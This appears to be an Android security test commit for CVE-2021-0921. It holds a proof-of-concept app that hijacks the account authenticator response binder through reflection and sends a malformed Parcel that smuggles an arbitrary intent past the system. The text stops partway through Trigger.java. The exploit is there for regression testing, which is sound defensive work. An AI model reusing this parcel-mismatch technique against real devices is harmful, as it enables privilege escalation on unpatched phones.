STS test for Android Security CVE-2021-0921
Test: sts-tradefed run sts-engbuild-no-spl-lock -m CtsSecurityBulletinHostTestCases -t android.security.cts.CVE_2021_0921
Bug: 199779591
Bug: 195962697
Change-Id: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
Merged-In: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
new file mode 100644
index 0000000..27900e1
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
@@ -0,0 +1,68 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeFull;
+import android.util.Log;
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+import com.android.tradefed.log.LogUtil.CLog;
+import org.junit.After;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0921 extends BaseHostJUnit4Test {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0921";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "CVE-2021-0921.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 195962697)
+ @AppModeFull
+ public void testRunDeviceTest() throws Exception {
+
+ CLog.i("testRunDeviceTest() start");
+ installPackage();
+
+ //ensure the screen is woken up.
+ //KEYCODE_WAKEUP wakes up the screen
+ //KEYCODE_MENU called twice unlocks the screen (if locked)
+ getDevice().executeShellCommand("input keyevent KEYCODE_WAKEUP");
+ getDevice().executeShellCommand("input keyevent KEYCODE_MENU");
+ getDevice().executeShellCommand("input keyevent KEYCODE_HOME");
+ getDevice().executeShellCommand("input keyevent KEYCODE_MENU");
+
+ //run the test
+ Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "test"));
+ CLog.i("testRunDeviceTest() end");
+ }
+
+ private void installPackage() throws Exception {
+ installPackage(TEST_APP, new String[0]);
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk
new file mode 100644
index 0000000..57296eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2021 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_PACKAGE_NAME := CVE-2021-0921
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+LOCAL_MODULE_TAGS := tests
+LOCAL_SDK_VERSION := current
+LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.core
+LOCAL_STATIC_JAVA_LIBRARIES += androidx.test.rules
+LOCAL_STATIC_JAVA_LIBRARIES += ub-uiautomator
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+LOCAL_PROGUARD_ENABLED := disabled
+LOCAL_DEX_PREOPT := false
+include $(BUILD_CTS_SUPPORT_PACKAGE)
+
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml
new file mode 100644
index 0000000..2e81b86
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml
@@ -0,0 +1,57 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_0921"
+ android:targetSandboxVersion="2">
+
+ <application>
+ <uses-library android:name="android.test.runner"/>
+
+ <activity android:name=".AuthenticatorActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name=".TestActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.RUN"/>
+ <category android:name="android.intent.category.DEFAULT"/>
+ </intent-filter>
+ </activity>
+
+ <service
+ android:name=".AuthenticatorService"
+ android:enabled="true"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+ </application>
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0921" />
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml
new file mode 100644
index 0000000..09d024c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <TextView
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:text="CVE-2021-0921"/>
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml
new file mode 100644
index 0000000..69b2233
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<resources>
+ <color name="colorPrimary">#008577</color>
+ <color name="colorPrimaryDark">#00574B</color>
+ <color name="colorAccent">#D81B60</color>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml
new file mode 100644
index 0000000..1a689a5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml
@@ -0,0 +1,3 @@
+<resources>
+ <string name="app_name">AnyIntentPoc</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml
new file mode 100644
index 0000000..46194d5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<account-authenticator
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="android.security.cts"
+ android:label="@string/app_name"/>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java
new file mode 100644
index 0000000..4d4ad98
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java
@@ -0,0 +1,157 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.annotation.SuppressLint;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.IInterface;
+import android.os.Parcel;
+import android.os.RemoteException;
+import android.util.Log;
+
+import java.io.FileDescriptor;
+import java.lang.reflect.Field;
+
+public class Authenticator extends AbstractAccountAuthenticator {
+ public static Intent mIntent;
+ private int TRANSACTION_onResult;
+ private IBinder mOriginRemote;
+ private static final String TAG = "TAG_2021_0921.Authenticator";
+ private IBinder mProxyRemote = new IBinder() {
+ @Override
+ public String getInterfaceDescriptor() throws RemoteException {
+ return null;
+ }
+
+ @Override
+ public boolean pingBinder() {
+ return false;
+ }
+
+ @Override
+ public boolean isBinderAlive() {
+ return false;
+ }
+
+ @Override
+ public IInterface queryLocalInterface(String descriptor) {
+ return null;
+ }
+
+ @Override
+ public void dump(FileDescriptor fd, String[] args) throws RemoteException {
+ }
+
+ @Override
+ public void dumpAsync(FileDescriptor fd, String[] args) throws RemoteException {
+ }
+
+ @Override
+ public boolean transact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
+ Log.d(TAG, "transact() start");
+ if (code == TRANSACTION_onResult) {
+ Log.d(TAG, "transact() before parse");
+ data.recycle();
+ data = GenMalformedParcel.parsingPackageImplParcel(mIntent);
+ Log.d(TAG, "transact() end parse");
+ }
+ Log.d(TAG, "transact() continue");
+ mOriginRemote.transact(code, data, reply, flags);
+ Log.d(TAG, "transact() end");
+ return true;
+ }
+
+ @Override
+ public void linkToDeath(DeathRecipient recipient, int flags) throws RemoteException {
+ }
+
+ @Override
+ public boolean unlinkToDeath(DeathRecipient recipient, int flags) {
+ return false;
+ }
+ };
+
+ public Authenticator(Context context) {
+ super(context);
+ Log.d(TAG, "Authenticator() constructor");
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account,
+ String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
+ String authTokenType, String[] requiredFeatures, Bundle options) {
+
+ Log.d(TAG, "addAccount() start");
+ try {
+ Class AccountAuthenticatorResponseClass = Class.forName("android.accounts.AccountAuthenticatorResponse");
+ @SuppressLint("SoonBlockedPrivateApi")
+ Field mAccountAuthenticatorResponseField = AccountAuthenticatorResponseClass.getDeclaredField("mAccountAuthenticatorResponse");
+ mAccountAuthenticatorResponseField.setAccessible(true);
+ Object mAccountAuthenticatorResponse = mAccountAuthenticatorResponseField.get(response);
+
+ Class stubClass = null;
+ for (Class inner : Class.forName("android.accounts.IAccountAuthenticatorResponse").getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub")) {
+ stubClass = inner;
+ break;
+ }
+ }
+
+ Field TRANSACTION_onResultField = stubClass.getDeclaredField("TRANSACTION_onResult");
+ TRANSACTION_onResultField.setAccessible(true);
+ TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null);
+
+ Class proxyClass = null;
+ for (Class inner : stubClass.getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub.Proxy")) {
+ proxyClass = inner;
+ break;
+ }
+ }
+
+ Field mRemoteField = proxyClass.getDeclaredField("mRemote");
+ mRemoteField.setAccessible(true);
+ mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse);
+ mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ Log.d(TAG, "addAccount() end");
+
+ return new Bundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account, String[] features) {
+ return null;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java
new file mode 100644
index 0000000..41e30eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java
@@ -0,0 +1,31 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+import android.os.Build;
+import android.os.Bundle;
+import android.util.Log;
+
+public class AuthenticatorActivity extends Activity {
+
+ private static final String TAG = "TAG_2021_0921.AuthenticatorActivity";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG, "onCreate() start");
+ setContentView(R.layout.activity_main);
+ new Trigger(AuthenticatorActivity.this).accountSettings();
+ Log.d(TAG, "onCreate() end");
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ this.finish();
+ }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
new file mode 100644
index 0000000..9170562
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
@@ -0,0 +1,15 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
+
+public class AuthenticatorService extends Service {
+ public AuthenticatorService() {
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new Authenticator(this).getIBinder();
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
new file mode 100644
index 0000000..51733ef
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0921;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.os.SystemClock;
+import android.util.Log;
+import android.support.test.uiautomator.UiDevice;
+import androidx.test.runner.AndroidJUnit4;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.junit.Assert.assertFalse;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final String TAG = "TAG_2021_0921.DeviceTest";
+ private UiDevice mDevice;
+
+ @Test
+ public void test() {
+ Log.d(TAG, "test() start");
+
+ //set mDevice and go to homescreen
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ mDevice.pressHome();
+ Context context = getApplicationContext();
+ String TEST_PACKAGE = "android.security.cts.CVE_2021_0921";
+ PackageManager packageManager = context.getPackageManager();
+
+ //start poc app
+ Intent intent = packageManager.getLaunchIntentForPackage(TEST_PACKAGE);
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+
+ //wait for poc app to complete (it takes about 6 seconds)
+ SystemClock.sleep(20000);
+
+ Log.d(TAG, "test() end");
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java
new file mode 100644
index 0000000..ff0bb62
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java
@@ -0,0 +1,210 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Binder;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.util.Log;
+
+public class GenMalformedParcel {
+
+ private static final String TAG = "TAG_2021_0921.GenMalformedParcel";
+
+ public static Parcel parsingPackageImplParcel(Intent intent) {
+ Log.d(TAG, "parsingPackageImplParcel() start");
+
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("key1");
+ data.writeInt(4);
+ data.writeString("android.content.pm.parsing.ParsingPackageImpl");
+
+ data.writeInt(0); // supportsSmallScreens
+ data.writeInt(0); // supportsNormalScreens
+ data.writeInt(0); // supportsLargeScreens
+ data.writeInt(0); // supportsExtraLargeScreens
+ data.writeInt(0); // resizeable
+ data.writeInt(0); // anyDensity
+ data.writeInt(0); // versionCode
+ data.writeInt(0); // versionCodeMajor
+ data.writeInt(0); // baseRevisionCode
+ data.writeString("versionName"); // versionName
+ data.writeInt(0); // compileSdkVersion
+ data.writeString("compileSdkVersionCodeName"); // compileSdkVersionCodeName
+ data.writeString("packageName"); // packageName
+ data.writeString("realPackage"); // realPackage
+ data.writeString("baseCodePath"); // baseCodePath
+ data.writeInt(false ? 1 : 0); // requiredForAllUsers
+ data.writeString("restrictedAccountType"); // restrictedAccountType
+ data.writeString("requiredAccountType"); // requiredAccountType
+ data.writeString("overlayTarget"); // overlayTarget
+ data.writeString("overlayTargetName"); // overlayTargetName
+ data.writeString("overlayCategory"); // overlayCategory
+ data.writeInt(0); // overlayPriority
+ data.writeInt(false ? 1 : 0); // overlayIsStatic
+ data.writeInt(0); // overlayables
+ data.writeString("staticSharedLibName"); // staticSharedLibName
+ data.writeLong(0); // staticSharedLibVersion
+ data.writeInt(0); // libraryNames
+ data.writeInt(0); // usesLibraries
+ data.writeInt(0); // usesOptionalLibraries
+ data.writeInt(0); // usesStaticLibraries
+ data.writeInt(0); // usesStaticLibrariesVersions
+ data.writeInt(0); // digestsSize
+ data.writeString("sharedUserId"); // sharedUserId
+ data.writeInt(0); // sharedUserLabel
+ data.writeInt(0); // configPreferences
+ data.writeInt(0); // reqFeatures
+ data.writeInt(0); // featureGroups
+ data.writeInt(0); // restrictUpdateHash
+ data.writeInt(0); // originalPackages
+ data.writeInt(0); // adoptPermissions
+ data.writeInt(0); // requestedPermissions
+ data.writeInt(0); // implicitPermissions
+ data.writeInt(0); // upgradeKeySets
+ data.writeInt(0); // keySetMapping
+ data.writeInt(0); // protectedBroadcasts
+ data.writeInt(0); // activities
+ data.writeInt(0); // receivers
+ data.writeInt(0); // services
+ data.writeInt(0); // providers
+ data.writeInt(0); // attributions
+ data.writeInt(0); // permissions
+ data.writeInt(0); // permissionGroups
+ data.writeInt(0); // instrumentations
+ data.writeInt(0); // preferredActivityFilters
+ data.writeInt(0); // processes
+ data.writeInt(0); // metaData
+ data.writeString("volumeUuid"); // volumeUuid
+ data.writeInt(-1); // signingDetails
+ data.writeString("codePath"); // codePath
+ data.writeInt(false ? 1 : 0); // use32BitAbi
+ data.writeInt(false ? 1 : 0); // visibleToInstantApps
+ data.writeInt(false ? 1 : 0); // forceQueryable
+
+ data.writeInt(1); // queriesIntents
+ data.writeInt(0); // queriesIntents
+
+ data.writeInt(0); // queriesPackages
+ data.writeInt(0); // queriesProviders
+ data.writeString(""); // appComponentFactory
+ data.writeString(""); // backupAgentName
+ data.writeInt(-1); // banner
+ data.writeInt(0); // category
+ data.writeString(""); // classLoaderName
+ data.writeString("className"); // className
+ data.writeInt(-1); // compatibleWidthLimitDp
+ data.writeInt(0); // descriptionRes
+ data.writeInt(false ? 1 : 0); // enabled
+ data.writeInt(false ? 1 : 0); // crossProfile
+ data.writeInt(0); // fullBackupContent
+ data.writeInt(0); // iconRes
+ data.writeInt(0); // installLocation
+
+ data.writeInt(0); // labelRes -> queriesPackages
+ data.writeInt(0); // largestWidthLimitDp -> queriesProviders
+ data.writeInt(-1); // logo -> appComponentFactory
+ data.writeString("manageSpaceActivityName"); // manageSpaceActivityName -> backupAgentName
+ data.writeFloat(0); // maxAspectRatio -> banner
+ data.writeFloat(0); // minAspectRatio -> category
+ data.writeInt(-1); // minSdkVersion -> classLoaderName
+ data.writeInt(-1); // networkSecurityConfigRes -> className
+ data.writeInt(1); // nonLocalizedLabel -> compatibleWidthLimitDp
+ data.writeInt(-1); // nonLocalizedLabel -> descriptionRes
+ data.writeInt(-1); // permission -> enabled
+ data.writeInt(-1); // processName -> crossProfile
+ data.writeInt(0); // requiresSmallestWidthDp -> fullBackupContent
+ data.writeInt(0); // roundIconRes -> iconRes
+ data.writeInt(0); // targetSandboxVersion -> installLocation
+ data.writeInt(0); // targetSdkVersion -> labelRes
+ data.writeInt(-1); // taskAffinity -> largestWidthLimitDp
+ data.writeInt(0); // theme -> logo
+ data.writeInt(-1); // uiOptions -> manageSpaceActivityName
+ data.writeInt(-1); // zygotePreloadName -> maxAspectRatio
+ data.writeInt(0); // splitClassLoaderNames -> minAspectRatio
+ data.writeInt(0); // splitCodePaths -> minSdkVersion
+ data.writeInt(0); // splitDependencies -> networkSecurityConfigRes
+ data.writeInt(0); // splitFlags -> nonLocalizedLabel
+ data.writeInt(-1); // splitNames -> nonLocalizedLabel
+ data.writeInt(-1); // splitRevisionCodes -> permission
+ data.writeInt(false ? 1 : 0); // externalStorage -> processName
+ data.writeInt(false ? 1 : 0); // baseHardwareAccelerated -> processName
+ data.writeInt(true ? 1 : 0); // allowBackup -> requiresSmallestWidthDp
+ data.writeInt(false ? 1 : 0); // killAfterRestore -> roundIconRes
+ data.writeInt(false ? 1 : 0); // restoreAnyVersion -> targetSandboxVersion
+ data.writeInt(false ? 1 : 0); // fullBackupOnly -> targetSdkVersion
+ data.writeInt(false ? 1 : 0); // persistent -> taskAffinity
+ data.writeInt(false ? 1 : 0); // debuggable -> taskAffinity
+ data.writeInt(false ? 1 : 0); // vmSafeMode -> theme
+ data.writeInt(false ? 1 : 0); // hasCode -> uiOptions
+ data.writeInt(false ? 1 : 0); // allowTaskReparenting -> zygotePreloadName
+ data.writeInt(false ? 1 : 0); // allowClearUserData -> zygotePreloadName
+ data.writeInt(false ? 1 : 0); // largeHeap -> splitClassLoaderNames
+ data.writeInt(false ? 1 : 0); // usesCleartextTraffic -> splitCodePaths
+ data.writeInt(false ? 1 : 0); // supportsRtl -> splitDependencies
+ data.writeInt(false ? 1 : 0); // testOnly -> splitFlags
+ data.writeInt(false ? 1 : 0); // multiArch -> splitNames
+ data.writeInt(false ? 1 : 0); // extractNativeLibs -> splitRevisionCodes
+ data.writeInt(false ? 1 : 0); // game -> externalStorage
+ data.writeInt(false ? 1 : 0); // resizeableActivity -> baseHardwareAccelerated
+ data.writeInt(false ? 1 : 0); // staticSharedLibrary -> allowBackup
+ data.writeInt(false ? 1 : 0); // overlay -> killAfterRestore
+ data.writeInt(false ? 1 : 0); // isolatedSplitLoading -> restoreAnyVersion
+ data.writeInt(false ? 1 : 0); // hasDomainUrls -> fullBackupOnly
+ data.writeInt(false ? 1 : 0); // profileableByShell -> persistent
+ data.writeInt(false ? 1 : 0); // backupInForeground -> debuggable
+ data.writeInt(false ? 1 : 0); // useEmbeddedDex -> vmSafeMode
+ data.writeInt(false ? 1 : 0); // defaultToDeviceProtectedStorage -> hasCode
+ data.writeInt(false ? 1 : 0); // directBootAware -> allowTaskReparenting
+ data.writeInt(false ? 1 : 0); // partiallyDirectBootAware -> allowClearUserData
+ data.writeInt(false ? 1 : 0); // resizeableActivityViaSdkVersion -> largeHeap
+ data.writeInt(false ? 1 : 0); // allowClearUserDataOnFailedRestore -> usesCleartextTraffic
+ data.writeInt(false ? 1 : 0); // allowAudioPlaybackCapture -> supportsRtl
+ data.writeInt(false ? 1 : 0); // requestLegacyExternalStorage -> testOnly
+ data.writeInt(false ? 1 : 0); // usesNonSdkApi -> multiArch
+ data.writeInt(false ? 1 : 0); // hasFragileUserData -> extractNativeLibs
+ data.writeInt(false ? 1 : 0); // cantSaveState -> game
+ data.writeInt(false ? 1 : 0); // allowNativeHeapPointerTagging -> resizeableActivity
+ data.writeInt(0); // autoRevokePermissions -> staticSharedLibrary
+ data.writeInt(false ? 1 : 0); // preserveLegacyExternalStorage -> overlay
+ data.writeInt(0); // mimeGroups -> isolatedSplitLoading
+ data.writeInt(0); // gwpAsanMode -> hasDomainUrls
+ data.writeInt(0); // minExtensionVersions -> profileableByShell
+
+ data.writeString("key2");
+ data.writeInt(-1);
+
+ data.writeString("key3");
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0);
+ int byteArrayStartPos = data.dataPosition();
+ for (int i = 0; i < 7; i++) {
+ data.writeInt(0);
+ }
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+ Log.d(TAG, "parsingPackageImplParcel() end");
+ return data;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java
new file mode 100644
index 0000000..5fe3acf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java
@@ -0,0 +1,23 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+
+import android.os.Bundle;
+import android.util.Log;
+import org.junit.Assert;
+
+public class TestActivity extends Activity {
+ private static final String TAG = "TAG_2021_0921.TestActivity";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG, "onCreate() start");
+ Assert.fail("Arbitrary intent executed. Device is vulnerable.");
+ }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
new file mode 100644
index 0000000..987b161
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
@@ -0,0 +1,41 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.ApplicationInfo;
+import android.net.Uri;
+import android.util.Log;
+
+import java.io.File;
+
+public class Trigger {
+ private static final String TAG = "TAG_2021_0921.Triggger";
+ private Context mContext;
+
+ public Trigger(Context context) {
+ mContext = context;
+ }
+
